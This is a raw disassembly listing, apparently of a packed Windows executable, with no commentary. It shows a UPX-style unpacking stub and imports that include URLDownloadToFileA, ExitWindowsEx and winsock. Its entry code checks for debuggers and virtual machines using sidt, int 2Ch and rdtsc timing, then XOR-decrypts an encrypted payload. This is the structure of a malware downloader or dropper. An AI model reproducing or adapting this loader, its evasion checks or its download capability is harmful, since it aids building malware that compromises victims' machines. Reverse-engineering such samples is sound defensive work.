dd 476D5C18h, 0E00086Dh, 0D9BC1598h, 5255319Ch, 0E99F444Ch
dd 6A518374h, 481C19D2h, 9B5B390h, 170AE0C1h, 0B6596524h
dd 17FF504Dh, 0C390402h, 96596596h, 10131534h, 96590903h
dd 74025965h, 0F208010Dh, 73659604h, 50710B0Eh, 92FE8045h
dd 3014CFFh, 8200800h, 0B010F9Ah, 41660601h, 4052C6CFh
dd 0BE2FCC13h, 0F7D9E764h, 0F10040Fh, 5B070004h, 17B67406h
dd 0CB0C3180h, 10EC0DE0h, 0BA360607h, 0B4CB2101h, 0A4A2A041h
dd 8C2B829h, 85F02E26h, 79DB06Ch, 3090213Ah, 8F052D98h
dd 2E609501h, 29611072h, 53B9309Bh, 6A0309B0h, 0DEECD3BDh
dd 3C262E40h, 75026C8h, 94E1B6E5h, 0EB00C027h, 5E0343F8h
dd 75h, 4800000h, 0FF00h, 3 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_407000
lea edi, [esi-6000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_409082
; ---------------------------------------------------------------------------
align 8
loc_409078: ; CODE XREF: seg001:loc_409089�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_40907E: ; CODE XREF: seg001:00409116�j
; seg001:0040912D�j
add ebx, ebx
jnz short loc_409089
loc_409082: ; CODE XREF: seg001:00409070�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_409089: ; CODE XREF: seg001:00409080�j
jb short loc_409078
mov eax, 1
loc_409090: ; CODE XREF: seg001:0040909F�j
; seg001:004090AA�j
add ebx, ebx
jnz short loc_40909B
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_40909B: ; CODE XREF: seg001:00409092�j
adc eax, eax
add ebx, ebx
jnb short loc_409090
jnz short loc_4090AC
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_409090
loc_4090AC: ; CODE XREF: seg001:004090A1�j
xor ecx, ecx
sub eax, 3
jb short loc_4090C0
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_409132
mov ebp, eax
loc_4090C0: ; CODE XREF: seg001:004090B1�j
add ebx, ebx
jnz short loc_4090CB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4090CB: ; CODE XREF: seg001:004090C2�j
adc ecx, ecx
add ebx, ebx
jnz short loc_4090D8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4090D8: ; CODE XREF: seg001:004090CF�j
adc ecx, ecx
jnz short loc_4090FC
inc ecx
loc_4090DD: ; CODE XREF: seg001:004090EC�j
; seg001:004090F7�j
add ebx, ebx
jnz short loc_4090E8
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_4090E8: ; CODE XREF: seg001:004090DF�j
adc ecx, ecx
add ebx, ebx
jnb short loc_4090DD
jnz short loc_4090F9
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_4090DD
loc_4090F9: ; CODE XREF: seg001:004090EE�j
add ecx, 2
loc_4090FC: ; CODE XREF: seg001:004090DA�j
cmp ebp, 0FFFFF300h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_40911C
loc_40910D: ; CODE XREF: seg001:00409114�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_40910D
jmp loc_40907E
; ---------------------------------------------------------------------------
align 4
loc_40911C: ; CODE XREF: seg001:0040910B�j
; seg001:00409129�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_40911C
add edi, ecx
jmp loc_40907E
; ---------------------------------------------------------------------------
loc_409132: ; CODE XREF: seg001:004090BC�j
pop esi
mov edi, esi
mov ecx, 5Dh
loc_40913A: ; CODE XREF: seg001:00409141�j
; seg001:00409146�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_40913F: ; CODE XREF: seg001:00409164�j
cmp al, 1
ja short loc_40913A
cmp byte ptr [edi], 1
jnz short loc_40913A
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_40913F
lea edi, [esi+7000h]
loc_40916C: ; CODE XREF: seg001:0040918E�j
mov eax, [edi]
or eax, eax
jz short loc_4091B7
mov ebx, [edi+4]
lea eax, [eax+esi+9000h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+90A0h]
xchg eax, ebp
loc_409189: ; CODE XREF: seg001:004091AF�j
mov al, [edi]
inc edi
or al, al
jz short loc_40916C
mov ecx, edi
jns short near ptr loc_40919A+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_40919A: ; CODE XREF: seg001:00409192�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+90A4h]
or eax, eax
jz short loc_4091B1
mov [ebx], eax
add ebx, 4
jmp short loc_409189
; ---------------------------------------------------------------------------
loc_4091B1: ; CODE XREF: seg001:004091A8�j
call dword ptr [esi+90A8h]
loc_4091B7: ; CODE XREF: seg001:00409170�j
popa
jmp loc_402FCC
; ---------------------------------------------------------------------------
align 1000h
seg001 ends
; Section 3. (virtual address 0000A000)
; Virtual size : 00008000 ( 32768.)
; Section size in file : 00008000 ( 32768.)
; Offset to raw data for section: 0000A000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
seg002 segment para public 'CODE' use32
assume cs:seg002
;org 40A000h
assume es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing
dd 3 dup(0)
dd 0A0E0h, 0A0A0h, 3 dup(0)
dd 0A0EDh, 0A0B0h, 3 dup(0)
dd 0A0FAh, 0A0B8h, 3 dup(0)
dd 0A103h, 0A0C0h, 3 dup(0)
dd 0A10Eh, 0A0C8h, 3 dup(0)
dd 0A119h, 0A0D0h, 3 dup(0)
dd 0A124h, 0A0D8h, 5 dup(0)
dd 7C801D77h, 7C80ADA0h, 7C81CDDAh, 0
dd 77DD6BF0h, 0
dd 76D64B79h, 0
dd 77C39E7Eh, 0
dd 42D779A3h, 0
dd 7E45A045h, 0
dd 71AB2BF4h, 0
db 4Bh ; K
db 45h, 52h, 4Eh
db 45h ; E
db 4Ch, 33h, 32h
db 2Eh ; .
db 44h, 2 dup(4Ch)
db 0
db 41h, 44h, 56h
db 41h ; A
db 50h, 49h, 33h
db 32h ; 2
db 2Eh, 64h, 6Ch
db 6Ch ; l
align 2
dw 4349h
db 4Dh ; M
db 50h, 2Eh, 64h
db 6Ch ; l
db 6Ch, 0, 4Dh
db 53h ; S
db 56h, 43h, 52h
db 54h ; T
db 2Eh, 64h, 6Ch
db 6Ch ; l
align 2
dw 7275h
db 6Ch ; l
db 6Dh, 6Fh, 6Eh
db 2Eh ; .
db 64h, 2 dup(6Ch)
db 0
db 55h, 53h, 45h
db 52h ; R
db 33h, 32h, 2Eh
db 64h ; d
db 2 dup(6Ch), 0
db 57h ; W
db 53h, 32h, 5Fh
db 33h ; 3
db 32h, 2Eh, 64h
db 6Ch ; l
db 6Ch, 2 dup(0)
aLoadlibrarya db 'LoadLibraryA',0
align 2
aGetprocaddress db 'GetProcAddress',0
align 2
aExitprocess db 'ExitProcess',0
align 4
aRegclosekey db 'RegCloseKey',0
db 0
align 2
aIcmpsendecho db 'IcmpSendEcho',0
align 4
aExit db 'exit',0
align 2
aUrldownloadtof db 'URLDownloadToFileA',0
align 2
aExitwindowsex db 'ExitWindowsEx',0
dd 398h dup(0)
; =============== S U B R O U T I N E =======================================
public start
start proc near
cld
call loc_40B02E
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40B006 proc near ; CODE XREF: seg002:0040B07D�p
push ebx
mov ecx, 0DA5h
mov ebx, edx
loc_40B00E: ; CODE XREF: sub_40B006+13�j
xor [eax], dx
lea eax, [eax+2]
xchg dl, dh
lea edx, [ebx+edx]
loop loc_40B00E
pop ebx
retn
sub_40B006 endp
; ---------------------------------------------------------------------------
db 7Eh, 2Dh
; ---------------------------------------------------------------------------
loc_40B01F: ; CODE XREF: seg002:0040B068�j
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40B021: ; CODE XREF: seg002:0040B036�j
; seg002:0040B047�j
push ebp
mov eax, 8000h
xor ecx, ecx
jmp short loc_40B055
; =============== S U B R O U T I N E =======================================
sub_40B02B proc near ; CODE XREF: seg002:0040B04A�p
; seg002:0040B050�p
rdtsc
retn
sub_40B02B endp
; ---------------------------------------------------------------------------
loc_40B02E: ; CODE XREF: start+1�p
test eax, eax
jnz short loc_40B03A
int 2Ch ; Internal routine for MSDOS (IRET)
test eax, eax
jns short loc_40B021
jmp short loc_40B049
; ---------------------------------------------------------------------------
loc_40B03A: ; CODE XREF: seg002:0040B030�j
push eax
sidt fword ptr [esp-2]
pop eax
mov eax, [eax+6]
shl eax, 10h
jns short loc_40B021
loc_40B049: ; CODE XREF: seg002:0040B038�j
push ebp
call sub_40B02B
xchg eax, ecx
call sub_40B02B
loc_40B055: ; CODE XREF: seg002:0040B029�j
sub eax, ecx
mov ebp, [esp+4]
sub dword ptr [esp+4], 1FA6h
sub eax, 100h
jnb short loc_40B01F
sub ebp, 301006h
lea eax, [ebp+301082h]
mov dx, [eax-65h]
call sub_40B006
xchg eax, ebp
sub eax, 0D10DF720h
setalc
mov ah, 0D5h ; CODE XREF: seg002:0040B08B�j
jz short near ptr loc_40B089+1
cld
out 0AEh, eax ; Interrupt Controller #2, 8259A
xchg eax, esi
jecxz short loc_40B109
scasd
push ecx
; ---------------------------------------------------------------------------
db 0DBh, 33h, 86h
dd 0DA840614h, 0E16C3A5Eh, 0F0C309D0h, 0B89D1D8Bh, 0ADB9ACFBh
dd 79DD317Dh, 36F68DA5h, 8574D4B5h, 6EE9173Bh, 6B6456F9h
dd 0CAC7454Ah, 0FC6F426Dh, 25EA9928h, 0EAC8BEEEh, 93A96DD4h
dd 0BCA79EF5h, 0E73ECD51h, 0E68F2B65h, 49E5795Ch
dword_40B0E4 dd 8633B1FEh, 67EE6F15h, 0B64FE441h, 0DB6F1338h, 96FD9A69h
; CODE XREF: seg002:0040B12F�j
dd 33DF1E14h, 8833A8DAh, 0F696032Eh, 109F6062h
db 3Eh
; ---------------------------------------------------------------------------
loc_40B109: ; CODE XREF: seg002:0040B091�j
sbb al, bl
push 0FFFFFFBCh
push ebx
mov byte ptr [edx+45A228F0h], 0C3h
mov word ptr [ecx], fs
sahf
sbb al, 1Eh
mov cl, 0FDh
jz short loc_40B161
leave
and al, ch
sub dword ptr [edi+31FBF825h], 402A2CB5h
imul eax, ebx, -2Bh
push ebx
jo short near ptr dword_40B0E4
; ---------------------------------------------------------------------------
aOHrT6mgEdzc_Nm db 'Ž{HàÒT',1Bh,'6MƒÜE„‡c.µNMÌÛÚ_',0
db 92h, 35h, 0A6h
dd 2D14B024h, 0FD5CEEDAh
db 0F8h, 2Fh, 88h
; ---------------------------------------------------------------------------
loc_40B157: ; CODE XREF: seg002:0040B1BF�j
mov esp, 3B43617h
adc al, 64h
and dl, [edx]
dec esi
loc_40B161: ; CODE XREF: seg002:0040B11C�j
mov word ptr [ebx], cs
and eax, 679DE19Fh
aad 6Eh
aam 0B0h
xchg eax, esp
mov esi, 0B7E49C0Ch
add eax, 63D5F3B3h
mov bh, 0A0h
js short near ptr loc_40B182+1
mov dh, 30h
cmp al, 0E5h
frstor byte ptr [esi-2Ah]
loc_40B182: ; CODE XREF: seg002:0040B179�j
jo short loc_40B1BD
xchg edx, [ebx+3E59AF65h]
inc ebx
cmc
retn
; ---------------------------------------------------------------------------
db 0C5h, 57h, 0Ch
dd 0AA522385h, 768FCDC8h, 8AE0EBD1h, 0BB2483BFh, 0C34345D2h
dd 125BF8D6h, 93836790h, 0A8C27410h, 9162F00Fh, 0C1189A47h
dd 6D001B4h
; ---------------------------------------------------------------------------
stosb
loc_40B1BD: ; CODE XREF: seg002:loc_40B182�j
repne lodsb
jo short loc_40B157
mov word ptr [edx], ds
int 3 ; Trap to Debugger
retf
; ---------------------------------------------------------------------------
db 0CDh, 27h, 44h
dd 4F19F3DDh, 0AD1C9EF9h, 35DB545h, 9B73C5DCh, 8D9AAF5Ch
dd 0E2CA4C4Bh, 3175427Eh, 22ABA2AFh, 78C45BF2h, 249A78F6h
dd 5D2294B2h, 4BDFADDBh, 0D8DC08F9h, 0F3C82547h, 76BAAEDAh
dd 0A7223DCFh, 0E63C073Dh, 0A79A754h, 3D2A7603h, 8E34ED55h
dd 85D4553Fh, 0CE15FD02h, 582B9D86h, 4652799Dh, 337B810Bh
dd 0B7B9B0AFh, 0E0DB365Bh, 0B3860C06h, 0DE31B3D9h, 6B48A05Dh
dd 0B0893B23h, 3AB0B973h, 0E6E0625Dh, 37E45E0Ah, 8937BDB5h
dd 820BA461h, 698E7B5Bh, 0E43ABDDFh, 71739763h, 53922425h
dd 0E73CBFB3h, 0B908FE9Ah, 387D1720h, 40C2BBh, 94EC6CCDh
dd 0DCC11A78h, 1449AFB7h, 0A6C318FCh, 826AF614h, 0C143753Ch
dd 97F2745Bh, 439CAD92h, 0EF4F23C1h, 0CEBB776Dh, 45ED6F5Ch
dd 0DD515B3Ch, 29757A5Fh, 479431A4h, 4EC218F6h, 9ECB5108h
dd 0A13424ADh, 0F552D603h, 8C573DF0h, 44AA2C2Eh, 0F7578E4Dh
dd 0DE840875h, 0B1AD1F0Dh, 7FD7DBBCh, 0A634AD41h, 7A898FA5h
dd 2A4DDFFh, 2E08897Bh, 54B3371Dh, 2CCF6559h, 0DCF68B4Eh
dd 0D130B82Bh, 8260D2FEh, 9F200B3Ch, 5A48C62Dh, 1DE5EBD8h
dd 390D8F86h, 6D95BAB5h, 81419DBh, 9E821408h, 0DD3A3D03h
dd 0C56C353h, 0B8116C75h, 6241B839h, 82E3EAE1h, 0BB23B908h
dd 174058DAh, 88EF63E5h, 3F15A7BBh, 59EAD981h, 159311E7h
dd 1A909693h, 84C3453Eh, 186EF10Ch, 0E8E6261Bh, 0A04E4772h
dd 0C286F287h, 441FED66h, 32AD4AA4h, 74250DF3h, 4705F59Ch
dd 45DCDCFDh, 21684FF3h, 0C992A19Fh, 8734B306h, 0A9DD9E09h
dd 0D021EEA6h, 0D0AB4F4Eh, 8C7CBD74h, 0B58F4197h, 0F534B3FAh
dd 427A9628h, 0D625C7FCh, 81BB9FDFh, 2D163A74h, 0D927A9C3h
dd 0D5933F5Fh, 7F716B50h, 0F7A33952h, 58E5869h, 65EA44C0h
dd 562DAFCFh, 3D9318Fh, 59816DCAh, 8D32D8B1h, 0DEB45E37h
dd 5F880A68h, 1E59E4B3h, 14A9E0Fh, 688B3D26h, 0ECC93DECh
dd 8EE359E5h, 393B9D0Ch, 5C398BA7h, 90E56F76h, 9E62FC85h
dd 0F73C5338h, 17656A55h, 3DA40216h, 7CB22144h, 94DB7435h
dd 7E02E640h, 342F491h, 96EE707Fh, 2AF57358h, 9F15B7CAh
dd 0F4980502h, 15F87873h, 8A3DA6A0h, 65A4762Ch, 758BFB8Dh
dd 2CCE44C3h, 0CCF74944h, 2D834F4Eh, 66DB2F3Ah, 1BFA4C5Dh
dd 76D377DCh, 0A353B951h, 0CA29F425h, 5A41791Fh, 0A454D6C9h
dd 0C165C610h, 3CFC4954h, 963EAFA5h, 0A666E21Dh, 8C3ACE72h
dd 765AECE4h, 0FF50DEBFh, 0ABE56277h, 3071A647h, 0BCCC097Eh
dd 9A21C97Dh, 695FD1FEh, 5008E681h, 6A9A3DB8h, 7495AD8h
dd 999B8E84h, 79B4B3D1h, 9C9CB28Fh, 0B53EBCD6h, 0C539CA00h
dd 0C55CB33h, 4747C68Ah, 53906BA3h, 7BA76CE1h, 4591D2D1h
dd 9950323Dh, 7861CF90h, 413EFC90h, 59EC0FA9h, 61AB68E7h
dd 34FE0B4Fh, 5FC2443Bh, 288E7E23h, 0E8F51FAFh, 47B14672h
dd 0B8F306Ch, 934A9C99h, 22971E15h, 8B8EA0A0h, 0CA2CB561h
dd 1918ACDh, 5070AFCh, 209B2F97h, 90CA7C67h, 0DB8A0A9Ah
dd 1DB55DF1h, 90CC7E65h, 0FB37861h, 8422A4A4h, 5503C5AEh
dd 0BF86FBCCh, 0D6148D65h, 7E2ABCBDh, 2D7BFD00h, 0EA7CA8ABh
dd 0D583059Eh, 2F7F6853h, 1FA2ABA9h, 8ABF0708h, 0F2D3C78Fh
dd 895ACBF9h, 7738B25Bh, 0A609F9F9h, 0DF1FA4FDh, 0DA8A0C0Fh
dd 1E569CF7h, 25B1B483h, 7355A37Fh, 37D25452h, 0E33597E1h
dd 8EE173C3h, 398D0F0Dh, 0E538BAB7h, 90E46663h, 0C4C3445Fh
dd 0D710642Ch, 3EBEC265h, 0C6E6D594h, 0B5FD2E59h, 0F1990D25h
dd 5AFB795Ch, 81238CD9h, 0E5990C0Ch, 22FC4848h, 9F2D90CBh
dd 0F4F0071Fh, 20EE6A65h, 8347BDA0h, 0F681011Eh, 69F4F7Dh
dd 852BA9B1h, 0F09F3E0Ah, 4A2657Fh, 872CAAB7h, 0F2903D14h
dd 39C46A79h, 923EBBB7h, 0D2BF7E32h, 2EDC4B7Bh, 943CA799h
dd 0E38CF210h, 28D96E20h, 0AB33ACAAh, 0D16DE912h, 22C66446h
dd 0FC3DBAABh, 0C960F539h, 3BE55652h, 9B3DBBA3h, 0CE7AC97Dh
dd 2D14248h, 6A338EBBh, 9D7AE0E5h, 38D86B1Eh, 6A0990A7h
dd 0C9498EF7h, 34EC4E46h, 6C0280A8h, 0C06BD786h, 3AD65574h
dd 7911939Ch, 0C365F0E0h, 62FD4D50h, 48138CA7h, 0E977F8E5h
dd 65DB3A51h, 571D8EA4h, 0E971FAE6h, 68A52F52h, 591F88A1h
dd 0AC63FCFDh, 7AB025Bh, 7A0CA18Ch, 8418DBF0h, 1893224h
dd 7F038488h, 0A274FDD0h, 71872D28h, 4E0596A8h, 0AC68EDE2h
dd 6A10E2Ah, 4F079697h, 0CC5FD9ECh, 23BE290Dh, 65059A90h
dd 8145CEC8h, 3BA9232Ch, 5212BEF8h, 0A24FC1F0h, 15BA3100h
dd 4C3EFBBAh, 0A741F0D3h, 0EEBF3B20h, 581EBAFEh, 0AB54CDFCh
dd 0C6BC3B3Fh, 697E4179h, 0B57FDFC9h, 0E0B82234h, 5FE76D4Ah
dd 0A84DC3DCh, 0C6B63533h, 46E14105h, 0BA41D8E7h, 0CDA82A33h
dd 57E27B6Eh, 9940DBC6h, 0E4B2275Eh, 77E66D6Bh, 815ADBD8h
dd 0EC8E2F60h, 5AE4436Fh, 9D4ADBC4h, 0EEA96623h, 5FF9447Dh
dd 0A05DF2CFh, 9182050Dh, 52F66540h, 8D52A9FCh, 0E39A0D2Bh
dd 7FF17678h, 8F318CBCh, 0FA9F3F06h, 33EA7E70h, 833696BEh
dd 0E4831709h, 2BDA2C26h, 0EE33BAB2h, 0FA9C073Ch, 77EC5272h
dd 882F82F0h, 0FEA4781Ah, 2FE44078h, 0A14DAAA8h, 0F4BF0F15h
dd 3CE44277h, 9639A0B2h, 0EC990A07h, 2FFB2A5Ch, 9A3A93BCh
dd 0C890D111h, 3ECE5971h, 8C338BCAh, 0C16EED30h, 2AC35976h
dd 9E3588CDh, 0F205F71Ch, 22D05E4Bh, 8939B786h, 0C34EEC33h
dd 3B45344h, 742B93BAh, 0C14BE01Eh, 58D55747h, 70089181h
dd 0DC65C8E7h, 2FF63A4Bh, 72098198h, 0C15EE4F6h, 32D34A58h
dd 790080B9h, 0D37BFDDCh, 15F23E5Ah, 6C029B9Ch, 0D054F1FFh
dd 2ABE255Bh, 751BA896h, 0EC71E2EFh, 2A32D48h, 5D6B9E96h
dd 0DA64DBE5h, 3AA7305Ch, 730E809Ah, 0BA5DE9E7h, 2EB00840h
dd 6D0E9499h, 0A67FCFF2h, 1EA92137h, 5105BDEEh, 0A14AEEFBh
dd 15873D23h, 6B1090A2h, 0CB70CFF4h, 6853807h, 4B339991h
dd 8020C7CCh, 1CBC0138h, 4A05A999h, 0A251C1C0h, 19A53F1Bh
dd 5C37FB94h, 0BA41D6E9h, 0BB33701h, 2B159294h, 0A576DCE7h
dd 0E1B7203Ah, 5F175674h, 0B548DEDFh, 0EBB8321Ah, 61817A70h
dd 0BE59FFD9h, 0FF8B232Bh, 5CE17277h, 0B249DFE6h, 0FCBA3029h
dd 33E9666Fh, 0AD65C0FFh, 0DCBB1434h, 40FE7E61h, 8478DBD2h
dd 0F5930C32h, 5BF95D0Ah, 8051D4E0h, 0DD81020Eh, 57F96078h
dd 0A454E9D0h, 0C38E1A0Dh, 55FA677Ah, 0B469C0DEh, 0F39E3F24h
dd 4DE36C62h, 862DA0BBh, 0FB9E0A14h, 4BFC7071h, 852BA5BDh
dd 0E2931707h, 35F97914h, 9934A6D7h, 0F99D0C09h, 319F447Bh
dd 0EF3CAFA4h, 0FE981D1Eh, 26CD5718h, 0F139AAA8h, 0F98D1526h
dd 33C04968h, 803FBE86h, 0F09D3614h, 49CD4678h, 9027BB8Eh
dd 0D49AEF01h, 8DF4859h, 9238B6A6h, 0C767F016h, 3ACF4472h
dd 9410DBA9h, 0C877E20Ch, 21FE4741h, 0FD1DB0AAh, 0CC7CE432h
dd 20D15855h, 6E3A919Dh, 0ED66FE2Bh, 23D8712Ah, 660F91B0h
dd 0CE69DCF5h, 36D17C49h, 4222E5BDh, 0FB5ED1D2h, 19940E03h
dd 5B65AB97h, 0D953F5E2h, 2BD94D5Ch, 5E6790BBh, 0C85DF3EFh
dd 6F52E53h, 4E11AE98h, 0DC71C48Dh, 14A53768h, 7E0ABB9Dh
dd 0C653FDE5h, 0C90447Dh, 6108BC80h, 0B474FBC5h, 2DBC035Ah
dd 1D8672EAh, 0AC4B54BDh, 87C64842h, 1855BF60h, 0C2769EF3h
dd 189B1A14h, 4EBF7EF5h, 9E4E7417h, 279B0C22h, 0BCE008A0h
dd 4E2092B3h, 0ED33428Fh
dd 2447D553h, 132A6021h, 0D24BDD19h, 1479CBECh, 0D34EF65Ah
dd 0EB2F5C3Bh, 2A4BD1B5h, 5229682Dh, 81D254C4h, 4D2997AFh
dd 0DA3AAABh, 485F563Dh, 2FE84268h, 0B12BBDADh, 86BD0B5Bh
dd 31E3516Ch, 8C2EDAAFh, 1D250C08h, 33B6248Bh, 4ACEEAEEh
dd 8AED7490h, 69FDF48Dh, 0F4B43B38h, 8003626Fh, 278C9B87h
dd 3234B985h, 5C1C3636h, 15F29487h, 6AB7BC87h, 90E6735Bh
dd 0C46D40E6h, 76B83446h, 1FE95B49h, 3D8E929Fh, 16032ABBh
dd 11679198h, 3FA83693h, 0F0CF4A30h, 0A4077169h, 0CA64E2EBh
dd 0DD6A4D3Ah, 0EC32F16Bh, 0DA11AD1Dh, 749CBDAh, 650A8870h
dd 86FEE493h, 0F14C2696h, 1DA57A6Fh, 77BEA0F7h, 7E86E2C5h
dd 0AEDB9DF4h, 18F3781Ch, 0A4038496h, 8CFF158Ch, 4F2D2C2Eh
dd 3AC028EDh, 0FE01B35Eh, 1BAD2BE3h, 0FA58DA24h, 4B85DB78h
dd 51802891h, 68D622A5h, 0A93793FBh, 747E6777h, 74E0F6h
dd 0CA054FFDh, 4D73B2EDh, 23ADE2E5h, 0B5C30846h, 5A93391Dh
dd 0C53FE4F2h, 0B3678EEEh, 2E4608CFh, 8C7119DFh, 0DDFFE547h
dd 60BB3D38h, 0F3D3855h, 0D9CAFDAh, 638D25D2h, 0E64506Ah
dd 3198958Dh, 66BF4031h, 0D94114E7h, 4DDE1CF0h, 6CB5229Ah
dd 0FE990CA0h, 0CED01A51h, 3F17CE68h, 4C3E3C61h, 9648DBFCh
dd 0FA3AB828h, 1B40DE70h, 4C17591Ah, 42EB40D0h, 9DA5DFF0h
dd 0CDDA9876h, 75214B22h, 0E277A17Ah, 0E1E834F6h, 0FCCE4D7Bh
dd 0E445F0FEh, 593B13E0h, 4BE1B8DBh, 0AA9A0DF9h, 2D89C4E7h
dd 0BD2E2498h, 2A7A14A9h, 5778A7A8h, 0B1CA25B9h, 0D6E175FFh
dd 5A279987h, 84DB712Bh, 2FC6850Dh, 37ABACADh, 86D65A51h
dd 30866C50h, 48D2AFAFh, 88E97772h, 0B708FB8Dh, 0DF31B695h
dd 8AB60E5Dh, 35880EE0h, 0B561E3B3h, 1920365Fh, 37BB212Fh
dd 74BB7186h, 8EE26565h, 3BE4415Dh, 8D38D1E6h, 0D0E56763h
dd 0CA04EC5Ch, 713C8E92h, 0C99C9CE0h, 39FC4240h, 0BE3FC1BAh
dd 0B4CFD998h, 0C0971910h, 0DB6E1D28h, 566B2969h, 55790A60h
dd 87914CEFh, 0CFA0216Bh, 3608E040h, 0B648FAEDh, 4A81B6E8h
dd 8835DD4Eh, 7C4BFDE8h, 0CBA53D38h, 0CAFB6170h, 0F34FD452h
dd 5EC9D771h, 0BAFF3876h, 0A501836Ch, 0F0AD2F23h, 0B23CD44Ch
dd 7654E6E2h, 0A3028AB1h, 6AD8D121h, 33C226C4h, 0F503B554h
dd 7D66A4DBh, 3F07DCFFh, 9786887Fh, 12B3412Dh, 15215259h
dd 0B5EB8A4Eh, 47B4A3A7h, 0D25CE1E5h, 2BD873D7h, 0A53E37EDh
dd 961E3D8h, 0B20C7E00h, 6786BA30h, 8925F5AEh, 310190B9h
dd 60BA3CD2h, 7945D95Eh, 8691D47Bh, 24F27766h, 0C0ECCB94h
dd 0F413D24Bh, 0CEF8E12h, 413FBAE4h, 92D5036Fh, 5299420Ch
dd 0AAEEE226h, 28169893h, 6CC2448Eh, 4A3DD16Bh, 4117CCDFh
dd 6FC446E7h, 0B767376Eh, 431591A5h, 72C648DCh, 0ED04D3CCh
dd 0C526A230h, 75C8C6CDh, 17E58F3h, 0F03E80BFh, 0CAF2B6Ah
dd 18D98883h, 515CD782h, 13ECB130h, 56028D8Dh, 0A321DA24h
dd 0BE17F6Bh, 0D53E3D94h, 6C15A9A8h, 81D07544h, 0D2291F08h
dd 0E90AC13Eh, 0D4126757h, 0C72E5052h, 0DB29ABA4h, 0E8A2381Dh
dd 55E06C68h, 0CB951AFh, 0DD86A77h, 0B272C6h, 24AA3878h
dd 0DBDB6D71h, 35840960h, 0B763E537h, 594B9F0Fh, 0BA8A3C26h
dd 0D32EC720h, 47D23361h, 6BDD5E58h, 70C7EBE6h, 90D44A62h
dd 0C4B41689h, 0D710702Ch, 12249165h, 0D867A9Dh, 2AC7C1BBh
dd 90CE30ECh, 3F9618FAh, 6C09EBDh, 96DD7214h, 71DAA69Fh
dd 58CFC68Fh, 98C04220h, 0CE17E515h, 0EF77F986h, 1F78D09Eh
dd 45AF115Bh, 0C1755948h, 19F5785Fh, 4792142Dh, 7B25CD4Ch
dd 61F97B62h, 79894E89h, 0A99939C7h, 0C98A1B37h, 1BF44F7Dh
dd 9E20ACA1h, 0EF93E016h, 3FC44045h, 2B65D8B2h, 53504BFCh
dd 0B12D62FAh, 0FF19B1CDh, 0C257D083h, 0E804BE3Eh, 465CEECCh
dd 0AB088A6Ah, 0A8F932A4h, 64A01E2Bh, 0E30E012Bh, 59B6382Ch
dd 42EC48B1h, 553E2587h, 0BE135C83h, 3BF66821h, 0E00EA0B6h
dd 0A0E83A58h, 3B497E48h, 93641989h, 7A78BD3Dh, 8B682965h
dd 0BA129529h, 45D64052h, 4769EBE2h, 28EB9DE5h, 68F06E9Ah
dd 9F67B36Dh, 5D9F88DCh, 6BF27409h, 27566260h, 20999AA5h
dd 613BB641h, 1A05A2BDh, 73E59AF2h, 71F67877h, 31346610h
dd 364C9EABh, 44F879F2h, 0EDE60AF2h, 941E90B5h, 78598CCFh
dd 2374A371h, 0F4A1C4A1h, 76B81400h, 4BE206ABh, 3B229488h
dd 7DCE5111h, 29B14576h, 622BA6A7h, 0F45D4C1Dh, 2813E2CFh
dd 8F26A8ABh, 0AFF3C1A9h, 79280031h, 0F1C03E53h, 0C65E5768h
dd 0BB42003Fh, 0F2FD6FEh, 0CF828D1h, 6091E4Fh, 0DD82E083h
dd 88A3DC9Fh, 46E25A62h, 12D0B1C6h, 0A2738B07h, 44012805h
dd 1136EE90h, 82FD31EBh, 3BC30BBCh, 660C3165h, 0C16F9561h
dd 5259B05h, 6D3B8D88h, 0A6525252h, 4E93253Fh, 0DF8BEB39h
dd 0A8EA5C56h, 0EA623A4h, 9BC2CCBCh, 0A6129097h, 32C92D3h
dd 6544F68Eh, 0A7C035E7h, 28CC4E15h, 0EF2D99C3h, 99F37504h
dd 0C1607697h, 0F07AD9BAh, 0B007ED91h, 0CB5D2429h, 0F27DDABCh
dd 920683F3h, 0B75A1C9Fh, 0C7D55B39h, 0F5FC4E42h, 1CA8401Dh
dd 97C62A98h, 2AFFB158h, 7C9B6A9Ah, 0FAB619CAh, 0A468D426h
dd 6393A5DDh, 7ED0DBFDh, 0A735B732h, 52DBE7AEh, 0AE6E2182h
dd 9A3B3F83h, 0C04B3618h, 16FCD8Ah, 9D3909F4h, 5C3F381Bh
dd 0C9F41CF2h, 3B0CBEA9h, 0EE33067Dh, 753D592h, 8714C40Eh
dd 0CB91C2BAh, 0A55D7EBh, 86571F03h, 4A113E04h, 0F785421Dh
dd 0A4661106h, 35EF4007h, 4138BBB1h, 90150371h, 9890420Ah
dd 23402070h, 0CC335B91h, 0FF86E07h, 7A0F8E86h, 8222FEF1h
dd 1A12E33h, 375DC287h, 0E976F0F3h, 23C6796Eh, 5925A0B7h
